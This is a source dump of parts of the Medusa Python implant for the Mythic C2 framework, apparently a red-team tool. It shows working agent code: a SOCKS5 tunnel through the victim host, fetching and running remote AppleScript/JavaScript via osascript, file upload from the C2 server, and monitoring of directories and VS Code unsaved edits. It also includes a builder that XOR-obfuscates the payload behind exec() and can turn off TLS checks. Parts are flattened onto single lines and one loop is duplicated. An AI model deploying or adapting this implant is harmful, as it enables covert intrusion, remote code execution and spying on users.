        self.sendTaskOutputUpdate(task_id, "[*] SOCKS Proxy started.\n")
        while True:
            if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]:
                return "[*] SOCKS Proxy stopped."
            if not self.socks_in.empty():
                packet_json = self.socks_in.get(timeout=QUEUE_TIMOUT)
                if packet_json:
                    server_id = packet_json["server_id"]
                    if server_id in self.socks_open.keys():
                        if packet_json["data"]:
                            self.socks_open[server_id].put(packet_json["data"])
                        elif packet_json["exit"]:
                            self.socks_open.pop(server_id)
                    else:
                        if not packet_json["exit"]:
                            if active_count() > MAX_THREADS:
                                time.sleep(3)  # FIX: was bare sleep(3)
                                continue
                            self.socks_open[server_id] = Queue()
                            sock = create_connection(packet_json)
                            if sock:
                                send_thread = Thread(target=a2m, args=(server_id, sock, ), name="A2M:{}".format(server_id))
                                recv_thread = Thread(target=m2a, args=(server_id, sock, ), name="M2A:{}".format(server_id))
                                send_thread.start()
                                recv_thread.start()
            time.sleep(SOCKS_SLEEP_INTERVAL)
    else:
        if len(t_socks) > 0:
            for t_sock in t_socks:
                task = [task for task in self.taskings if task["task_id"] == t_sock.name.split(":")[1]][0]
                task["stopped"] = task["completed"] = True
        self.socks_open = {}
def socks(self, task_id, action, port):
    """Start or stop the in-agent SOCKS5 proxy (Python 3 variant).

    action == "start": relay traffic between the Mythic server queues
    (self.socks_in / self.socks_out) and outbound TCP sockets until the
    task is stopped. Any other action: flag running socks tasks as
    stopped and clear the open-connection table.

    Fixes vs. original: create_socket's except clause referenced an
    unbound `err` (NameError), and the throttle path called bare
    `sleep(3)` where the rest of the function uses `time.sleep`.
    """
    # Imports made explicit so the command does not depend on
    # agent-global modules (base64/time/threading).
    import socket, select, queue, base64, time, threading
    from threading import Thread, active_count
    from struct import pack, unpack
    MAX_THREADS = 200
    BUFSIZE = 2048
    TIMEOUT_SOCKET = 5
    OUTGOING_INTERFACE = ""
    VER = b'\x05'
    M_NOAUTH = b'\x00'
    M_NOTAVAILABLE = b'\xff'
    CMD_CONNECT = b'\x01'
    ATYP_IPV4 = b'\x01'
    ATYP_DOMAINNAME = b'\x03'
    SOCKS_SLEEP_INTERVAL = 0.1
    QUEUE_TIMOUT = 1

    def sendSocksPacket(server_id, data, exit_value):
        # Queue a datagram for delivery back to the Mythic server.
        self.socks_out.put({
            "server_id": server_id,
            "data": base64.b64encode(data).decode(),
            "exit": exit_value
        })

    def create_socket():
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(TIMEOUT_SOCKET)
        except Exception as err:  # FIX: `err` was previously unbound
            return "Failed to create socket: {}".format(str(err))
        return sock

    def connect_to_dst(dst_addr, dst_port):
        sock = create_socket()
        if OUTGOING_INTERFACE:
            try:
                sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, OUTGOING_INTERFACE.encode())
            except PermissionError as err:
                return 0
        try:
            sock.connect((dst_addr, dst_port))
            return sock
        except socket.error as err:
            return 0

    def request_client(msg):
        # Parse a SOCKS5 CONNECT request; returns (addr, port) or False.
        try:
            message = base64.b64decode(msg["data"])
            s5_request = message[:BUFSIZE]
        except:
            return False
        if (s5_request[0:1] != VER or s5_request[1:2] != CMD_CONNECT
                or s5_request[2:3] != b'\x00'):
            return False
        if s5_request[3:4] == ATYP_IPV4:
            dst_addr = socket.inet_ntoa(s5_request[4:-2])
            dst_port = unpack('>H', s5_request[8:len(s5_request)])[0]
        elif s5_request[3:4] == ATYP_DOMAINNAME:
            sz_domain_name = s5_request[4]
            dst_addr = s5_request[5: 5 + sz_domain_name - len(s5_request)]
            port_to_unpack = s5_request[5 + sz_domain_name:len(s5_request)]
            dst_port = unpack('>H', port_to_unpack)[0]
        else:
            return False
        return (dst_addr, dst_port)

    def create_connection(msg):
        # Attempt the outbound connect and send the SOCKS5 reply upstream.
        dst = request_client(msg)
        rep = b'\x07'
        bnd = b'\x00' + b'\x00' + b'\x00' + b'\x00' + b'\x00' + b'\x00'
        if dst:
            socket_dst = connect_to_dst(dst[0], dst[1])
        if not dst or socket_dst == 0:
            rep = b'\x01'
        else:
            rep = b'\x00'
            bnd = socket.inet_aton(socket_dst.getsockname()[0])
            bnd += pack(">H", socket_dst.getsockname()[1])
        reply = VER + rep + b'\x00' + ATYP_IPV4 + bnd
        try:
            sendSocksPacket(msg["server_id"], reply, msg["exit"])
        except:
            return
        if rep == b'\x00':
            return socket_dst

    def get_running_socks_thread():
        # Other socks task threads (excluding this task's own).
        return [t for t in threading.enumerate()
                if "socks:" in t.name and not task_id in t.name]

    def a2m(server_id, socket_dst):
        # agent -> Mythic: read from the target socket, ship to server.
        while True:
            if task_id not in [task["task_id"] for task in self.taskings]:
                return
            elif [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]:
                return
            if server_id not in self.socks_open.keys():
                return
            try:
                reader, _, _ = select.select([socket_dst], [], [], 1)
            except select.error as err:
                return
            if not reader:
                continue
            try:
                for sock in reader:
                    data = sock.recv(BUFSIZE)
                    if not data:
                        sendSocksPacket(server_id, b"", True)
                        socket_dst.close()
                        return
                    sendSocksPacket(server_id, data, False)
            except Exception as e:
                pass
            time.sleep(SOCKS_SLEEP_INTERVAL)

    def m2a(server_id, socket_dst):
        # Mythic -> agent: pop queued data from server, write to socket.
        while True:
            if task_id not in [task["task_id"] for task in self.taskings]:
                return
            elif [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]:
                return
            if server_id not in self.socks_open.keys():
                socket_dst.close()
                return
            try:
                if not self.socks_open[server_id].empty():
                    socket_dst.send(base64.b64decode(self.socks_open[server_id].get(timeout=QUEUE_TIMOUT)))
            except:
                pass
            time.sleep(SOCKS_SLEEP_INTERVAL)

    t_socks = get_running_socks_thread()
    if action == "start":
        if len(t_socks) > 0:
            return "[!] SOCKS Proxy already running."
        self.sendTaskOutputUpdate(task_id, "[*] SOCKS Proxy started.\n")
        while True:
            if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]:
                return "[*] SOCKS Proxy stopped."
            if not self.socks_in.empty():
                packet_json = self.socks_in.get(timeout=QUEUE_TIMOUT)
                if packet_json:
                    server_id = packet_json["server_id"]
                    if server_id in self.socks_open.keys():
                        if packet_json["data"]:
                            self.socks_open[server_id].put(packet_json["data"])
                        elif packet_json["exit"]:
                            self.socks_open.pop(server_id)
                    else:
                        if not packet_json["exit"]:
                            if active_count() > MAX_THREADS:
                                time.sleep(3)  # FIX: was bare sleep(3)
                                continue
                            self.socks_open[server_id] = queue.Queue()
                            sock = create_connection(packet_json)
                            if sock:
                                send_thread = Thread(target=a2m, args=(server_id, sock, ), name="a2m:{}".format(server_id))
                                recv_thread = Thread(target=m2a, args=(server_id, sock, ), name="m2a:{}".format(server_id))
                                send_thread.start()
                                recv_thread.start()
            time.sleep(SOCKS_SLEEP_INTERVAL)
    else:
        if len(t_socks) > 0:
            for t_sock in t_socks:
                task = [task for task in self.taskings if task["task_id"] == t_sock.name.split(":")[1]][0]
                task["stopped"] = task["completed"] = True
        self.socks_open = {}
data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file, "chunk_num": chunk_num+1 }, "task_id": task_id } ]} response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] chunk_num+=1 total_chunks = chunk["total_chunks"] cmd_code += base64.b64decode(chunk["chunk_data"]).decode() if cmd_code: args = [] if language == "JavaScript": args = ["osascript", "-l", "JavaScript", "-"] elif language == "AppleScript": args = ["osascript", "-"] osapipe = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) osapipe.stdin.write(cmd_code.encode()) stdout, stderr = osapipe.communicate() out = stderr if stderr else stdout return str(out) else: return "Failed to load script" ================================================ FILE: Payload_Type/medusa/medusa/agent_code/unload.py ================================================ def unload(self, task_id, command): try: getattr(medusa, command) except: return "{} not currently loaded.".format(command) delattr(medusa, command) cmd_list = [{"action": "remove", "cmd": command}] responses = [{ "task_id": task_id, "user_output": "Unloaded command: {}".format(command), "commands": cmd_list, "completed": True }] message = { "action": "post_response", "responses": responses } response_data = self.postMessageAndRetrieveResponse(message) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/unload_module.py ================================================ def unload_module(self, task_id, module_name): if module_name in self._meta_cache: finder = self._meta_cache.pop(module_name) sys.meta_path.remove(finder) self.moduleRepo.pop(module_name) return "{} module unloaded".format(module_name) else: return "{} not found in loaded modules".format(module_name) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/upload.py 
def upload(self, task_id, file, remote_path):
    """Pull a Mythic-hosted file down in chunks and write it to remote_path.

    Relative paths are resolved against the agent's current directory.
    Returns "Job stopped." if the task is flagged stopped mid-transfer.
    """
    if remote_path[0] == os.sep:
        dest = remote_path
    else:
        dest = os.path.join(self.current_directory, remote_path)
    chunk_index = 1
    chunk_total = 1  # corrected by the first server response
    with open(dest, "wb") as out_file:
        while chunk_index <= chunk_total:
            current = [t for t in self.taskings if t["task_id"] == task_id][0]
            if current["stopped"]:
                return "Job stopped."
            request = {
                "action": "post_response",
                "responses": [
                    {
                        "upload": {
                            "chunk_size": CHUNK_SIZE,
                            "file_id": file,
                            "chunk_num": chunk_index,
                            "full_path": dest,
                        },
                        "task_id": task_id,
                    }
                ],
            }
            reply = self.postMessageAndRetrieveResponse(request)
            piece = reply["responses"][0]
            chunk_index += 1
            chunk_total = piece["total_chunks"]
            out_file.write(base64.b64decode(piece["chunk_data"]))
def vscode_list_recent(self, task_id, db=""):
    """List VS Code's recently opened files/folders from its state database.

    Reads the history.recentlyOpenedPathsList entry out of state.vscdb
    (per-user default path unless db is given) and returns JSON.
    """
    import os, sqlite3, json

    if db:
        path = db
    else:
        path = "/Users/{}/Library/Application Support/Code/User/globalStorage/state.vscdb".format(os.environ["USER"])
    if not os.path.exists(path):
        return "VSCode State database path does not exist!"
    collected = []
    with sqlite3.connect(path) as con:
        rows = con.execute('SELECT * FROM "ItemTable" WHERE KEY = "history.recentlyOpenedPathsList"')
        for row in rows:
            for entry in json.loads(row[1])["entries"]:
                item = {}
                if "folderUri" in entry:
                    item["path"] = entry["folderUri"].replace("file://", "")
                    item["type"] = "folder"
                elif "fileUri" in entry:
                    item["path"] = entry["fileUri"].replace("file://", "")
                    item["type"] = "file"
                collected.append(item)
    return json.dumps({ "recents": collected })
def vscode_watch_edits(self, task_id, backups_path="", seconds=1):
    """Poll VS Code's Backups folder and report new/updated/copied/moved/
    deleted unsaved-edit backup files until the task is stopped or the
    folder disappears.

    Fix vs. original: the watch loop now honors the task's "stopped"
    flag (consistent with watch_dir), so the job can actually be killed.
    """
    import hashlib, time, os, json
    known_files = {}

    def getOriginalFileDetails(path):
        # Backup files start with the original URI, then a JSON metadata blob.
        with open(path, "r") as f:
            file_content = f.readlines()
        json_data = json.loads("{" + file_content[0].split("{")[1].rstrip())
        return (
            file_content[0].split("{")[0].replace("untitled:", "").replace("file://", "").rstrip(),
            json_data["size"],
            time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data["mtime"] / 1000))
        )

    def diffFolder(file_path, print_out=True):
        # One sweep: record additions/changes, then detect deletions.
        for root, dirs, files in os.walk(file_path):
            for dir in dirs:
                full_dir_path = os.path.join(root, dir)
                if full_dir_path not in known_files.keys():
                    if print_out:
                        self.sendTaskOutputUpdate(task_id, "\n\n[*] New Directory: {}".format(full_dir_path))
                    known_files[full_dir_path] = ""
            for file in files:
                full_file_path = os.path.join(root, file)
                file_size = 0
                try:
                    with open(full_file_path, "rb") as in_f:
                        file_data = in_f.read()
                        file_size = len(file_data)
                except:
                    continue
                hash = hashlib.md5(file_data).hexdigest()
                if full_file_path not in known_files.keys() and hash not in known_files.values():
                    if print_out:
                        original_file_path, size, modified_time = getOriginalFileDetails(full_file_path)
                        self.sendTaskOutputUpdate(task_id, "\n\n[*] New File: \n - Backup File: {} ({} bytes) \n - Original File: {} ({} bytes) - Last Modified: {}".format(
                            full_file_path, file_size, original_file_path, size, modified_time))
                    known_files[full_file_path] = hash
                elif full_file_path in known_files.keys() and hash not in known_files.values():
                    if print_out:
                        original_file_path, size, modified_time = getOriginalFileDetails(full_file_path)
                        self.sendTaskOutputUpdate(task_id, "\n\n[*] File Updated: \n - Backup File: {} ({} bytes) \n - Original File: {} ({} bytes) - Last Modified: {}".format(
                            full_file_path, file_size, original_file_path, size, modified_time))
                    known_files[full_file_path] = hash
                elif full_file_path not in known_files.keys() and hash in known_files.values():
                    # Same content under a new path: copied if the old path
                    # still exists, otherwise moved.
                    orig_file = [f for f, h in known_files.items() if h == hash][0]
                    if os.path.exists(os.path.join(file_path, orig_file)):
                        if print_out:
                            self.sendTaskOutputUpdate(task_id, "\n\n[*] Copied File: {}->{} - {} bytes ({})".format(orig_file, full_file_path, file_size, hash))
                    else:
                        if print_out:
                            self.sendTaskOutputUpdate(task_id, "\n\n[*] Moved File: {}->{} - {} bytes ({})".format(orig_file, full_file_path, file_size, hash))
                        known_files.pop(orig_file)
                    known_files[full_file_path] = hash
        for file in list(known_files):
            if not os.path.isdir(os.path.dirname(file)):
                # Parent directory vanished: everything under it is gone.
                for del_file in [f for f in list(known_files) if f.startswith(os.path.dirname(file))]:
                    obj_type = "Directory" if not known_files[del_file] else "File"
                    if file in list(known_files):
                        if print_out:
                            self.sendTaskOutputUpdate(task_id, "\n\n[*] {} deleted: {} {}".format(obj_type,
                                del_file, "({})".format(known_files[del_file]) if known_files[del_file] else ""))
                        known_files.pop(file)
            else:
                if os.path.basename(file) not in os.listdir(os.path.dirname(file)):
                    obj_type = "Directory" if not known_files[file] else "File"
                    if print_out:
                        self.sendTaskOutputUpdate(task_id, "\n\n[*] {} Deleted: {} {}".format(obj_type, file,
                            "({})".format(known_files[file]) if known_files[file] else ""))
                    known_files.pop(file)

    path = backups_path if backups_path else "/Users/{}/Library/Application Support/Code/Backups".format(os.environ["USER"])
    if not os.path.isdir(path):
        return "[!] Path must be a valid directory"
    elif not os.access(path, os.R_OK):
        return "[!] Path not accessible"
    else:
        self.sendTaskOutputUpdate(task_id, "[*] Starting directory watch for {}".format(path))
        diffFolder(path, False)
        while(True):
            # FIX: honor the task stop flag, as watch_dir does.
            if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]:
                return "Job stopped."
            if not os.path.exists(path):
                return "[!] Root directory has been deleted."
            diffFolder(path)
            time.sleep(seconds)
def watch_dir(self, task_id, path, seconds):
    """Poll a directory tree and report new/updated/copied/moved/deleted
    files and directories every `seconds` until the task is stopped or
    the root directory disappears.

    "." resolves to the agent's current directory; relative paths are
    joined onto it. Improvement vs. original: os/time are imported
    locally (like this command's sibling vscode_watch_edits) instead of
    relying on agent-global imports.
    """
    import hashlib, os, time
    known_files = {}

    def diffFolder(file_path, print_out=True):
        # One sweep: record additions/changes, then detect deletions.
        for root, dirs, files in os.walk(file_path):
            for dir in dirs:
                full_dir_path = os.path.join(root, dir)
                if full_dir_path not in known_files.keys():
                    if print_out:
                        self.sendTaskOutputUpdate(task_id, "\n[*] New Directory: {}".format(full_dir_path))
                    known_files[full_dir_path] = ""
            for file in files:
                full_file_path = os.path.join(root, file)
                file_size = 0
                try:
                    with open(full_file_path, "rb") as in_f:
                        file_data = in_f.read()
                        file_size = len(file_data)
                except:
                    continue
                hash = hashlib.md5(file_data).hexdigest()
                if full_file_path not in known_files.keys() and hash not in known_files.values():
                    if print_out:
                        self.sendTaskOutputUpdate(task_id, "\n[*] New File: {} - {} bytes ({})".format(full_file_path, file_size, hash))
                    known_files[full_file_path] = hash
                elif full_file_path in known_files.keys() and hash not in known_files.values():
                    if print_out:
                        self.sendTaskOutputUpdate(task_id, "\n[*] File Updated: {} - {} bytes ({})".format(full_file_path, file_size, hash))
                    known_files[full_file_path] = hash
                elif full_file_path not in known_files.keys() and hash in known_files.values():
                    # Same content under a new path: copied if the old path
                    # still exists, otherwise moved.
                    orig_file = [f for f, h in known_files.items() if h == hash][0]
                    if os.path.exists(os.path.join(file_path, orig_file)):
                        if print_out:
                            self.sendTaskOutputUpdate(task_id, "\n[*] Copied File: {}->{} - {} bytes ({})".format(orig_file, full_file_path, file_size, hash))
                    else:
                        if print_out:
                            self.sendTaskOutputUpdate(task_id, "\n[*] Moved File: {}->{} - {} bytes ({})".format(orig_file, full_file_path, file_size, hash))
                        known_files.pop(orig_file)
                    known_files[full_file_path] = hash
        for file in list(known_files):
            if not os.path.isdir(os.path.dirname(file)):
                # Parent directory vanished: everything under it is gone.
                for del_file in [f for f in list(known_files) if f.startswith(os.path.dirname(file))]:
                    obj_type = "Directory" if not known_files[del_file] else "File"
                    if file in list(known_files):
                        if print_out:
                            self.sendTaskOutputUpdate(task_id, "\n[*] {} deleted: {} {}".format(obj_type,
                                del_file, "({})".format(known_files[del_file]) if known_files[del_file] else ""))
                        known_files.pop(file)
            else:
                if os.path.basename(file) not in os.listdir(os.path.dirname(file)):
                    obj_type = "Directory" if not known_files[file] else "File"
                    if print_out:
                        self.sendTaskOutputUpdate(task_id, "\n[*] {} deleted: {} {}".format(obj_type, file,
                            "({})".format(known_files[file]) if known_files[file] else ""))
                    known_files.pop(file)

    if path == ".":
        file_path = self.current_directory
    else:
        file_path = path if path[0] == os.sep else os.path.join(self.current_directory, path)
    if not os.path.isdir(file_path):
        return "[!] Path must be a valid directory"
    elif not os.access(file_path, os.R_OK):
        return "[!] Path not accessible"
    else:
        self.sendTaskOutputUpdate(task_id, "[*] Starting directory watch for {}".format(path))
        diffFolder(file_path, False)
        while(True):
            if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]:
                return "Job stopped."
            if not os.path.exists(file_path):
                return "[!] Root directory has been deleted."
            diffFolder(file_path)
            time.sleep(seconds)
+ Path(x).stem) for el in dir(module): if "__" not in el: globals()[el] = getattr(module, el) sys.path.append(os.path.abspath(currentPath.name)) ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/__init__.py ================================================ ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/builder.py ================================================ from mythic_container.PayloadBuilder import * from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import asyncio, pathlib, os, tempfile, base64, hashlib, json, re from itertools import cycle class Medusa(PayloadType): name = "medusa" file_extension = "py" author = "@ajpc500" supported_os = [ SupportedOS.Windows, SupportedOS.Linux, SupportedOS.MacOS ] wrapper = False wrapped_payloads = ["pickle_wrapper"] mythic_encrypts = True note = "This payload uses Python to create a simple agent" supports_dynamic_loading = True c2_profiles = ["http", "azure_blob"] build_parameters = [ BuildParameter( name="output", parameter_type=BuildParameterType.ChooseOne, description="Choose output format", choices=["py", "base64"], default_value="py" ), BuildParameter( name="python_version", parameter_type=BuildParameterType.ChooseOne, description="Choose Python version", choices=["Python 3.8", "Python 2.7"], default_value="Python 3.8" ), BuildParameter( name="use_non_default_cryptography_lib", parameter_type=BuildParameterType.ChooseOne, description="Use non-default 'cryptography' Python library for comms (if not, manual crypto will be used)", choices=["No", "Yes"], default_value="No" ), BuildParameter( name="obfuscate_script", parameter_type=BuildParameterType.ChooseOne, description="XOR and Base64-encode agent code", choices=["Yes", "No"], default_value="Yes" ), BuildParameter( name="https_check", parameter_type=BuildParameterType.ChooseOne, description="Verify HTTPS certificate (if 
HTTP, leave yes)", choices=["Yes", "No"], default_value="Yes" ) ] agent_path = pathlib.Path(".") / "medusa" / "mythic" agent_icon_path = agent_path / "medusa.svg" agent_code_path = pathlib.Path(".") / "medusa" / "agent_code" build_steps = [ BuildStep(step_name="Gathering Files", step_description="Creating script payload"), BuildStep(step_name="Obfuscating Script", step_description="Encoding and encrypting script content") ] translation_container = None def getPythonVersionFile(self, directory, file): pyv = self.get_parameter("python_version") filename = "" if os.path.exists(os.path.join(directory, "{}.py".format(file))): #while we've specified a python version, this function is agnostic so just return the .py filename = os.path.join(directory, "{}.py".format(file)) elif pyv == "Python 2.7": filename = os.path.join(directory, "{}.py2".format(file)) elif pyv == "Python 3.8": filename = os.path.join(directory, "{}.py3".format(file)) if not os.path.exists(filename) or not filename: return "" else: return filename def _read_file(self, path: str) -> str: with open(path, "r") as f: return f.read() def _apply_https_setting(self, base_code: str, profile_name: str) -> str: if self.get_parameter("https_check") != "No": return base_code.replace("#CERTSKIP", "") if profile_name == "azure_blob": return base_code.replace( "#CERTSKIP", """ gcontext = ssl.create_default_context() gcontext.check_hostname = False gcontext.verify_mode = ssl.CERT_NONE\n""" ) return base_code.replace("urlopen(req)", "urlopen(req, context=gcontext)").replace( "#CERTSKIP", """ gcontext = ssl.create_default_context() gcontext.check_hostname = False gcontext.verify_mode = ssl.CERT_NONE\n""" ) def _parse_transport_template(self, template_code: str) -> dict: parts = re.split(r"###\s*(IMPORTS|CLASS_FIELDS|FUNCTIONS|CONFIG)\s*###", template_code) sections = {"IMPORTS": "", "CLASS_FIELDS": "", "FUNCTIONS": "", "CONFIG": ""} for i in range(1, len(parts), 2): section_name = parts[i].strip() section_value = parts[i 
+ 1] sections[section_name] = section_value.strip("\n") return sections def _validate_transport_template_format(self, profile_name: str, template_code: str): required = ["IMPORTS", "CLASS_FIELDS", "FUNCTIONS", "CONFIG"] markers = re.findall(r"###\s*(IMPORTS|CLASS_FIELDS|FUNCTIONS|CONFIG)\s*###", template_code) missing = [m for m in required if markers.count(m) == 0] duplicates = [m for m in required if markers.count(m) > 1] if missing or duplicates: details = [] if missing: details.append("missing markers: {}".format(", ".join(missing))) if duplicates: details.append("duplicate markers: {}".format(", ".join(duplicates))) raise ValueError( "Transport template transport_{} has invalid section markers ({})".format( profile_name, "; ".join(details) ) ) def _validate_transport_sections(self, profile_name: str, sections: dict): required_non_empty = ["FUNCTIONS", "CONFIG"] missing = [s for s in required_non_empty if not sections.get(s, "").strip()] if missing: raise ValueError( "Transport template transport_{} is missing required non-empty sections: {}".format( profile_name, ", ".join(missing) ) ) def _validate_core_markers_replaced(self, base_code: str, profile_name: str): unresolved = [ marker for marker in [ "TRANSPORT_IMPORTS", "TRANSPORT_CLASS_FIELDS", "TRANSPORT_FUNCTIONS", "TRANSPORT_CONFIG", ] if marker in base_code ] if unresolved: raise ValueError( "Core template marker replacement failed for transport_{}; unresolved markers: {}".format( profile_name, ", ".join(unresolved) ) ) def _get_base_code_for_profile(self, profile_name: str) -> str: base_path = self.getPythonVersionFile(os.path.join(self.agent_code_path, "base_agent"), "base_agent_core") transport_path = self.getPythonVersionFile(os.path.join(self.agent_code_path, "base_agent"), f"transport_{profile_name}") if not base_path: raise ValueError("Missing base_agent_core template for selected python version") if not transport_path: raise ValueError("Missing transport template for profile {} and selected python 
version".format(profile_name)) base_code = self._read_file(base_path) transport_template = self._read_file(transport_path) self._validate_transport_template_format(profile_name, transport_template) transport_sections = self._parse_transport_template(transport_template) self._validate_transport_sections(profile_name, transport_sections) base_code = base_code.replace("TRANSPORT_IMPORTS", transport_sections["IMPORTS"]) base_code = base_code.replace("TRANSPORT_CLASS_FIELDS", transport_sections["CLASS_FIELDS"]) base_code = base_code.replace("TRANSPORT_FUNCTIONS", transport_sections["FUNCTIONS"]) base_code = base_code.replace("TRANSPORT_CONFIG", transport_sections["CONFIG"]) self._validate_core_markers_replaced(base_code, profile_name) return base_code def _to_python_literal(self, value): if isinstance(value, str): return value return json.dumps(value).replace("false", "False").replace("true", "True").replace("null", "None") def _apply_c2_parameter_replacements(self, base_code: str, c2): params = c2.get_parameters_dict() replacements = { "callback_host": params.get("callback_host", ""), "callback_port": params.get("callback_port", ""), "post_uri": params.get("post_uri", ""), "get_uri": params.get("get_uri", ""), "query_path_name": params.get("query_path_name", ""), "proxy_host": params.get("proxy_host", ""), "proxy_user": params.get("proxy_user", ""), "proxy_pass": params.get("proxy_pass", ""), "proxy_port": params.get("proxy_port", ""), "callback_interval": params.get("callback_interval", ""), "callback_jitter": params.get("callback_jitter", ""), "killdate": params.get("killdate", ""), "AESPSK": params.get("AESPSK", {}), "encrypted_exchange_check": params.get("encrypted_exchange_check", ""), "HEADER_PLACEHOLDER": params.get("headers", {}), } for placeholder, value in replacements.items(): if placeholder in base_code: base_code = base_code.replace(placeholder, self._to_python_literal(value)) return base_code async def build(self) -> BuildResponse: # this function gets 
called to create an instance of your payload resp = BuildResponse(status=BuildStatus.Success) # create the payload build_msg = "" try: command_code = "" for cmd in self.commands.get_commands(): command_path = self.getPythonVersionFile(self.agent_code_path, cmd) if not command_path: build_msg += "{} command not available for {}.\n".format(cmd, self.get_parameter("python_version")) else: command_code += self._read_file(command_path) + "\n" selected_c2 = None for c2 in self.c2info: profile_name = c2.get_c2profile()["name"] if profile_name in ["http", "azure_blob"]: selected_c2 = c2 break if selected_c2 is None: build_msg += "No supported C2 profile selected for {}.\n".format(self.name) resp.set_status(BuildStatus.Error) resp.build_stderr = "Error building payload: " + build_msg return resp profile_name = selected_c2.get_c2profile()["name"] base_code = self._get_base_code_for_profile(profile_name) if profile_name == "azure_blob": params = selected_c2.get_parameters_dict() killdate = params.get("killdate", None) callback_interval = str(params.get("callback_interval", "30")) callback_jitter = str(params.get("callback_jitter", "10")) config_data = await SendMythicRPCOtherServiceRPC(MythicRPCOtherServiceRPCMessage( ServiceName="azure_blob", ServiceRPCFunction="generate_config", ServiceRPCFunctionArguments={ "killdate": killdate, "payload_uuid": self.uuid } )) if not config_data.Success: resp.status = BuildStatus.Error resp.build_stderr = f"Build failed: {config_data.Error}" return resp await SendMythicRPCPayloadUpdatebuildStep( MythicRPCPayloadUpdateBuildStepMessage( PayloadUUID=self.uuid, StepName="Provisioning Azure Container", StepStdout=f"Container provisioned with scoped SAS token\nEndpoint: {config_data.Result['blob_endpoint']}", StepSuccess=True ) ) await SendMythicRPCPayloadUpdatebuildStep( MythicRPCPayloadUpdateBuildStepMessage( PayloadUUID=self.uuid, StepName="Stamping Configuration", StepStdout="Embedding Azure configuration into agent", StepSuccess=True ) ) 
base_code = base_code.replace("BLOB_ENDPOINT_PLACEHOLDER", config_data.Result["blob_endpoint"]) base_code = base_code.replace("CONTAINER_NAME_PLACEHOLDER", config_data.Result["container_name"]) base_code = base_code.replace("CONTAINER_SAS_PLACEHOLDER", config_data.Result["sas_token"]) base_code = base_code.replace("CALLBACK_INTERVAL_PLACEHOLDER", callback_interval) base_code = base_code.replace("CALLBACK_JITTER_PLACEHOLDER", callback_jitter) base_code = base_code.replace("AGENT_UUID_PLACEHOLDER", self.uuid) base_code = self._apply_https_setting(base_code, profile_name) if self.get_parameter("use_non_default_cryptography_lib") == "Yes": crypto_code = self._read_file(self.getPythonVersionFile(os.path.join(self.agent_code_path, "base_agent"), "crypto_lib")) else: crypto_code = self._read_file(self.getPythonVersionFile(os.path.join(self.agent_code_path, "base_agent"), "manual_crypto")) base_code = base_code.replace("CRYPTO_HERE", crypto_code) base_code = base_code.replace("UUID_HERE", self.uuid) base_code = base_code.replace("#COMMANDS_HERE", command_code) base_code = self._apply_c2_parameter_replacements(base_code, selected_c2) if build_msg != "": resp.build_stderr = build_msg resp.set_status(BuildStatus.Error) await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage( PayloadUUID=self.uuid, StepName="Gathering Files", StepStdout="Found all files for payload", StepSuccess=True )) if self.get_parameter("obfuscate_script") == "Yes": key = hashlib.md5(os.urandom(128)).hexdigest().encode() encrypted_content = ''.join(chr(c^k) for c,k in zip(base_code.encode(), cycle(key))).encode() b64_enc_content = base64.b64encode(encrypted_content) xor_func = "chr(c^k)" if self.get_parameter("python_version") == "Python 3.8" else "chr(ord(c)^ord(k))" base_code = """import base64, itertools exec(''.join({} for c,k in zip(base64.b64decode({}), itertools.cycle({}))).encode()) """.format(xor_func, b64_enc_content, key) await 
SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage( PayloadUUID=self.uuid, StepName="Obfuscating Script", StepStdout="Script successfully obfuscated.", StepSuccess=True )) else: await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage( PayloadUUID=self.uuid, StepName="Obfuscating Script", StepStdout="Obfuscation not requested, skipping.", StepSuccess=True )) if self.get_parameter("output") == "base64": resp.payload = base64.b64encode(base_code.encode()) resp.build_message = "Successfully Built" else: resp.payload = base_code.encode() resp.build_message = "Successfully built!" except Exception as e: resp.set_status(BuildStatus.Error) resp.build_stderr = "Error building payload: " + str(e) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/cat.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * import sys class CatArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="path", type=ParameterType.String, description="Read and output the content of a file", ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": self.load_args_from_json_string(self.command_line) else: self.add_arg("path", self.command_line) else: raise ValueError("Missing arguments") class CdCommand(CommandBase): cmd = "cat" needs_admin = False help_cmd = "cat /path/to/file" description = "Read and output the contents of a file" version = 1 author = "@ajpc500" attackmapping = [ "T1005" ] argument_class = CatArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: 
